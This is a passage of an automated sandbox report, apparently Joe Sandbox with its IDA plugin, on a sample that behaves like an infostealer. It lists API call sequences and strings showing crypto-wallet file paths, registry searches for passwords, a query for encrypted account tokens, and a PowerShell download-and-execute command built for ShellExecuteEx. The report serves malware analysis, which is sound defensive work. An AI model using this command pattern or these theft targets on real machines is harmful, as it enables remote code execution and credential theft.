                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 56ca92a0dc243f2afad6fb3927b5915fef760764a8ca2de79522774c67ffa3c6
                                • Instruction ID: c745ebb1b8727c94c62236b7fa1ece98d68adf68e4088ff459ce5f4aaa561af0
                                • Opcode Fuzzy Hash: 56ca92a0dc243f2afad6fb3927b5915fef760764a8ca2de79522774c67ffa3c6
                                • Instruction Fuzzy Hash: BA5154B1E5011897CB15FB60DD96FEE737CAF55300F404198B60A62093EE706B89DBA6
                                APIs
                                  • Part of subcall function 000872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                  • Part of subcall function 000872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                  • Part of subcall function 000872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                  • Part of subcall function 000872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                  • Part of subcall function 000872D0: HeapFree.KERNEL32(00000000), ref: 00087459
                                • lstrcat.KERNEL32(00000000,000A17FC), ref: 00087606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00087648
                                • lstrcat.KERNEL32(00000000, : ), ref: 0008765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0008768F
                                • lstrcat.KERNEL32(00000000,000A1804), ref: 000876A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 000876D3
                                • lstrcat.KERNEL32(00000000,000A1808), ref: 000876ED
                                • task.LIBCPMTD ref: 000876FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                • Instruction ID: f1b78da2fe00a68bffe477996a34699a4cc7e176f4180562e60ca133a6cab00a
                                • Opcode Fuzzy Hash: 3aac3d9d1c0fd4b1e3f60490b10f11a08ba02389b83427b4d16cb66a6f4d4b3f
                                • Instruction Fuzzy Hash: 9431FA71900109DBCF08FBE8EC9DDFE7779BB48305B644118F106A7295DE34A946CB62
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D0E888,00000000,?,000A0E2C,00000000,?,00000000), ref: 00098130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00098158
                                • __aulldiv.LIBCMT ref: 00098172
                                • __aulldiv.LIBCMT ref: 00098180
                                • wsprintfA.USER32 ref: 000981AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                • Instruction ID: f9e66a1022051dcb55224c4ed900ce1e242ef5aff4c4a339a42aa46437d4597e
                                • Opcode Fuzzy Hash: ceb41a6d2e9d040866573724c53306f5ce2c7618089f148583eae67f809dff09
                                • Instruction Fuzzy Hash: 79215CB1E44208ABDF00DFD4DD4AFAEB7B8FB45B04F104209F605BB280C77869018BA5
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                • InternetOpenA.WININET(000A0DF7,00000001,00000000,00000000,00000000), ref: 0008610F
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0008618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000861B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 000861DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0008620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00086249
                                • InternetCloseHandle.WININET(?), ref: 00086253
                                • InternetCloseHandle.WININET(00000000), ref: 00086260
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                • Instruction ID: 39bc09f5b34554ab2756e51c4e466bcdd2727355e9761328b8acea57106f5164
                                • Opcode Fuzzy Hash: ecc40172b3cf92a1284d21c04676cb898f536ec57118eaba6c73d0d083393c5a
                                • Instruction Fuzzy Hash: 1B5161B1A00218ABDF20EF50DC49FEEB7B8FB44705F108098B645A72C1DB756A89CF95
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0008733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000873B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0008740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00087452
                                • HeapFree.KERNEL32(00000000), ref: 00087459
                                • task.LIBCPMTD ref: 00087555
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                • Instruction ID: 04de08661ed8a09ceef4d726763f3f7bbec2cfff06fe24cfaacd6d32ac6377b1
                                • Opcode Fuzzy Hash: a26f2f49c62f6366de175d2a745e36abe7d4895c2db67f78a4499355481ad1ea
                                • Instruction Fuzzy Hash: F5614AB580416C9BDB24EB50DC45FDAB7B8BF44304F1081E9E689A6146DBB09BC9CFA1
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • lstrlen.KERNEL32(00000000), ref: 0008BC9F
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0008BCCD
                                • lstrlen.KERNEL32(00000000), ref: 0008BDA5
                                • lstrlen.KERNEL32(00000000), ref: 0008BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                • Instruction ID: 3494c23ae03be3f28986ac5020bb7c588b66600e52d3c53d89c382a87fd93ea3
                                • Opcode Fuzzy Hash: 1550926af4f867b03dfcefa438ef8b2cf2d8abfaf860d0dce5a864a5ebfdf470
                                • Instruction Fuzzy Hash: DDB12072A10118ABDF04FBA0DD96EEE737CBF55300F504169F506A6092EF346A49DBE2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                • Instruction ID: 298eba823dc7ca74481b7f2477490ca3f7f7a69f9112d580d867fda11bd53a47
                                • Opcode Fuzzy Hash: 4a26df422eb18943bdad209cd03e689ba508a38e8915f44330b6a0f6024f9d34
                                • Instruction Fuzzy Hash: C8F03A3090820DEFD7449FE0BD1DB6CFB70FB0470AF040199E60986290D6764A419B96
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00084FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00084FD1
                                • InternetOpenA.WININET(000A0DDF,00000000,00000000,00000000,00000000), ref: 00084FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00085011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00085041
                                • InternetCloseHandle.WININET(?), ref: 000850B9
                                • InternetCloseHandle.WININET(?), ref: 000850C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: a9d2595ba0792dc5c00134e13e8527fb7036da5b0796c58664122551e9719b5a
                                • Instruction ID: 01837ce61112a0e20535907ef9b96ed4a6b8592a6090c554e335942988b78c8c
                                • Opcode Fuzzy Hash: a9d2595ba0792dc5c00134e13e8527fb7036da5b0796c58664122551e9719b5a
                                • Instruction Fuzzy Hash: 9931E6B4A4021CABDB20DF54DC89BDDB7B4FB48709F1081D9EA09A7281D7706A858F99
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                • wsprintfA.USER32 ref: 00098459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,00D0EA98,00000000,000F003F,?,00000400), ref: 000984EC
                                • lstrlen.KERNEL32(?), ref: 00098501
                                • RegQueryValueExA.ADVAPI32(00000000,00D0E978,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000A0B34), ref: 00098599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                • Instruction ID: d3e448c92bd64a8e7e9d4c4ccc6f03eae0e4b502a71defd288c1f88b4382608d
                                • Opcode Fuzzy Hash: 8181f026aa32424ba3eb091e8439ef0a827b98a58822ab00b8df2f9fe85323af
                                • Instruction Fuzzy Hash: 8E21EB7191021C9BDB64DB54DC85FE9B3B8FB48704F00C5D8E649A6240DF716A85CFD4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000976A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000976AB
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE20,00000000,00020119,00000000), ref: 000976DD
                                • RegQueryValueExA.ADVAPI32(00000000,00D0E930,00000000,00000000,?,000000FF), ref: 000976FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00097708
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                • Instruction ID: a8e3920d274236e3eca6559199eee7c483683ec8489c8f47ee94ed1a0f88450a
                                • Opcode Fuzzy Hash: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                • Instruction Fuzzy Hash: 38016DB5A0420CBBEB00DBE4EC4DFAEB7B8EB48709F104194FA08D7291E6749904DB51
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0009773B
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE20,00000000,00020119,000976B9), ref: 0009775B
                                • RegQueryValueExA.ADVAPI32(000976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0009777A
                                • RegCloseKey.ADVAPI32(000976B9), ref: 00097784
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                • Instruction ID: 586df8aa2f1317cbda031f23b287618f71223e806fe60605c437993ef6cc1bb5
                                • Opcode Fuzzy Hash: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                • Instruction Fuzzy Hash: 440112B5A4030CBBEB00DBE4EC4EFAEB7B8FB48705F104559FA05A7291DA705A04CB52
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00093AEE,?), ref: 000992FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00099319
                                • CloseHandle.KERNEL32(000000FF), ref: 00099327
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-2052217321
                                • Opcode ID: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                • Instruction ID: 7b95bd8a590ced5df0d69f5119013ad1a842c8fe76755c33039d69fb99ab2d02
                                • Opcode Fuzzy Hash: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                • Instruction Fuzzy Hash: C2F03C75E44208FBDF20DFB4EC49F9EB7B9AB48710F10C258B651A72D0D67097019B50
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                • LocalFree.KERNEL32(0008148F), ref: 00089A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                • Instruction ID: d6f8461af0857a3cfb945ad84c8623d296412c710e55632014b62b6fe7b80baa
                                • Opcode Fuzzy Hash: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                • Instruction Fuzzy Hash: DE310AB4A00209EFDB14EF94D989FAE7BF9FF48344F148158E911A7290D774A941CFA2
                                APIs
                                • lstrcat.KERNEL32(?,00D0EBB8), ref: 000947DB
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094801
                                • lstrcat.KERNEL32(?,?), ref: 00094820
                                • lstrcat.KERNEL32(?,?), ref: 00094834
                                • lstrcat.KERNEL32(?,00CFA530), ref: 00094847
                                • lstrcat.KERNEL32(?,?), ref: 0009485B
                                • lstrcat.KERNEL32(?,00D0DD68), ref: 0009486F
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                  • Part of subcall function 00094570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                  • Part of subcall function 00094570: RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                  • Part of subcall function 00094570: wsprintfA.USER32 ref: 000945A6
                                  • Part of subcall function 00094570: FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                • Instruction ID: 2c2c3e7f4f97976ef5e1db9254bd49d0c12b57e50ca7298ecc3f9f865f988a97
                                • Opcode Fuzzy Hash: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                • Instruction Fuzzy Hash: A7317FB290021CA7CF10FBB0DC8AEE9737CAB48704F444589F35996082EE749789DB96
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00092D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092CC4
                                • <, xrefs: 00092D39
                                • ')", xrefs: 00092CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092D04
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
